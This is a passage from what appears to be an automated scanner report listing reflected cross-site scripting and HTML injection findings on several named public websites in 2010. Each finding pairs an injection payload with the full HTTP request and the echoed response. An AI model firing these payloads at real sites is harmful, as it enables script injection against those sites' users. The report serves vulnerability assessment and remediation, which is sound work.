The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 32c01<script>alert(1)</script>1eff1198961 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php32c01<script>alert(1)</script>1eff1198961 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 21 Nov 2010 17:13:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=4l75jifc1vmjsl9ceq8smd6no3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php32c01<script>alert(1)</script>1eff1198961</strong>
...[SNIP]...

1.142. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ba68"-alert(1)-"56e962f9ff9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/5ba68"-alert(1)-"56e962f9ff9 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 17:13:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 88293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/5ba68"-alert(1)-"56e962f9ff9";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

1.143. http://www.dailyrotation.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dailyrotation.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7d53'><script>alert(1)</script>ea2cc056bdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php/a7d53'><script>alert(1)</script>ea2cc056bdc HTTP/1.1
Host: www.dailyrotation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 18:11:57 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.10
Set-Cookie: PHPSESSID=8fe5413863d004cd4dffc69e9523aac6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 208601


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>


<TITLE>DAILY ROTATION</TITLE>
<META NAME="description" CONTENT="DAI
...[SNIP]...
<a class='delete_button' href='/index.php/a7d53'><script>alert(1)</script>ea2cc056bdc?delete_feed=1&id=1000042'>
...[SNIP]...

1.144. http://www.dailyrotation.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dailyrotation.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5acc8"><script>alert(1)</script>328385cd11c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php/5acc8"><script>alert(1)</script>328385cd11c HTTP/1.1
Host: www.dailyrotation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 18:11:53 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.10
Set-Cookie: PHPSESSID=c8c0a760cd8f98cd3b42b976fc403223; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 212394


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>


<TITLE>DAILY ROTATION</TITLE>
<META NAME="description" CONTENT="DAI
...[SNIP]...
<form name="options" action="/index.php/5acc8"><script>alert(1)</script>328385cd11c" method="POST">
...[SNIP]...

1.145. http://www.delicious.com/post [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.delicious.com
Path:   /post

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3e8b"><script>alert(1)</script>3501892d15d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /poste3e8b"><script>alert(1)</script>3501892d15d HTTP/1.1
Host: www.delicious.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 17:57:35 GMT
Set-Cookie: BX=bk4eee96eincf&b=3&s=p9; expires=Tue, 21-Nov-2012 20:00:00 GMT; path=/; domain=.delicious.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: searchTray=deleted; expires=Sat, 21-Nov-2009 17:57:34 GMT; path=/; domain=.delicious.com
Pragma: no-cache
Cache-Control: no-store, must-revalidate, no-cache, private, max-age=0, post-check=0, pre-check=0
X-Xss-Protection: 0
Expires: Sun, 1 Jan 2006 01:00:00 GMT
X-Ua-Compatible: IE=7
Set-Cookie: delicious_us_production=aOBwa0.OcQ6pvK8qi9rZPTho35F3kIgcrHKdNprAMBBeH0VAWeQUPcYK5diyA_KPmnbHcmDB7qOeHc.Y1SF_.JjJp3zW5idQnvtldXV5sLdQCx8VnSgf1vH12i8Il3UjL17Mnbx3uUKpBlJQUkWXoS.sPQWto5Rkd61EA50IQniwMKL7iRakgzOAS8TpWfy2QEjhf3gNQq0Y199oHJMHFSnHGHDGYsZupZ.D.tshfMRVzxsd.xDL_9RxZp.CbZ_jt9LHs0Z8bFlSqjXnVzKnTH1uGBgBRw1O6Fdti2MQqAsVOLsF0h_kxrpSOG_AaqnSSjAPe38pjVo-; expires=Mon, 21-Nov-2011 17:57:35 GMT; path=/; domain=.delicious.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 0
Connection: close
Server: YTS/1.17.21

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta h
...[SNIP]...
<a href="/poste3e8b"><script>alert(1)</script>3501892d15d?settagview=cloud">
...[SNIP]...

1.146. http://www.delicious.com/robots.txt [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.delicious.com
Path:   /robots.txt

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe581"><script>alert(1)</script>c005148dcf7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /robots.txtfe581"><script>alert(1)</script>c005148dcf7 HTTP/1.1
Host: www.delicious.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 17:57:32 GMT
Set-Cookie: BX=e7fd4k16eincc&b=3&s=o5; expires=Tue, 21-Nov-2012 20:00:00 GMT; path=/; domain=.delicious.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: searchTray=deleted; expires=Sat, 21-Nov-2009 17:57:31 GMT; path=/; domain=.delicious.com
Pragma: no-cache
Cache-Control: no-store, must-revalidate, no-cache, private, max-age=0, post-check=0, pre-check=0
X-Xss-Protection: 0
Expires: Sun, 1 Jan 2006 01:00:00 GMT
X-Ua-Compatible: IE=7
Set-Cookie: delicious_us_production=ckLtZtuNcQ42hIKZOkVaFKp1JLyzleBmiYSELxBCLupLYTAmo._oO8G9g2QNgTa7Nq8.YwWIKx9zQzypWUrdoMHsBt0YAkTsLhd67VFA93GJkBxj1Jtyb0iZSqWUABH1gRu6FXSTdIcBRVWJPj.E8WbkZPnKl0_S3.1lg1VxI9xpje0Gm4ce912BwZmgo3zQmkCG.SaOQv5_A3xNAWK42K38CN_5CfI0FhWlI2bp1wN.mO8DjVwhqQf90d_CHS5Yvfol9oB_f6ZEYCdxrjdbFil1Gz5E3mZn7LmhiRoL43vjABOUMY0Rc3ZNvdGrErptGcanCtfjnuM-; expires=Mon, 21-Nov-2011 17:57:32 GMT; path=/; domain=.delicious.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 0
Connection: close
Server: YTS/1.17.21

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta h
...[SNIP]...
<a href="/robots.txtfe581"><script>alert(1)</script>c005148dcf7?settagview=cloud">
...[SNIP]...

1.147. http://www.ninkasibrewing.com/beer_finder/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beer_finder/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cef6"><a>d1a9d545bb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finder7cef6"><a>d1a9d545bb1/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beer_finder7cef6"><a>d1a9d545bb1_page" class="beer_finder7cef6">
...[SNIP]...

1.148. http://www.ninkasibrewing.com/beer_finder/content/css/basic.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beer_finder/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19329"><a>8b6dab35f14 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finder19329"><a>8b6dab35f14/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beer_finder19329"><a>8b6dab35f14_page" class="beer_finder19329">
...[SNIP]...

1.149. http://www.ninkasibrewing.com/beer_finder/content/css/ninkasi.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beer_finder/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b114"><a>2a2a038a928 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finder6b114"><a>2a2a038a928/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beer_finder6b114"><a>2a2a038a928_page" class="beer_finder6b114">
...[SNIP]...

1.150. http://www.ninkasibrewing.com/beer_finder/content/css/print.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beer_finder/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 536f7"><a>2e8ea686748 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finder536f7"><a>2e8ea686748/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beer_finder536f7"><a>2e8ea686748_page" class="beer_finder536f7">
...[SNIP]...

1.151. http://www.ninkasibrewing.com/beer_finder/content/js/basic.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beer_finder/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4b6f"><a>5c83f0838cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finderf4b6f"><a>5c83f0838cb/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beer_finderf4b6f"><a>5c83f0838cb_page" class="beer_finderf4b6f">
...[SNIP]...

1.152. http://www.ninkasibrewing.com/beer_finder/content/js/combined.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beer_finder/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85e44"><a>7d1f97cbdd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finder85e44"><a>7d1f97cbdd2/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beer_finder85e44"><a>7d1f97cbdd2_page" class="beer_finder85e44">
...[SNIP]...

1.153. http://www.ninkasibrewing.com/beer_finder/content/js/combined.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beer_finder/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 392d4"><a>7acca5121c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finder392d4"><a>7acca5121c2/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beer_finder392d4"><a>7acca5121c2_page" class="beer_finder392d4">
...[SNIP]...

1.154. http://www.ninkasibrewing.com/beers/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beers/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8d2"><a>16a8c03f2fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beers4e8d2"><a>16a8c03f2fd/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.wired.com/playbook/?intcid=gnav

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Set-Cookie: PHPSESSID=rl6vcsjo3iil8biltj6mc4n0r2; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beers4e8d2"><a>16a8c03f2fd_page" class="beers4e8d2">
...[SNIP]...

1.155. http://www.ninkasibrewing.com/beers/content/css/basic.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beers/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41638"><a>88fb649091c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beers41638"><a>88fb649091c/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beers41638"><a>88fb649091c_page" class="beers41638">
...[SNIP]...

1.156. http://www.ninkasibrewing.com/beers/content/css/ninkasi.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beers/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 132d9"><a>11e6d305782 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beers132d9"><a>11e6d305782/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 21 Nov 2010 21:48:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beers132d9"><a>11e6d305782_page" class="beers132d9">
...[SNIP]...

1.157. http://www.ninkasibrewing.com/beers/content/css/print.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beers/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0387"><a>286a56ca007 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beersf0387"><a>286a56ca007/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

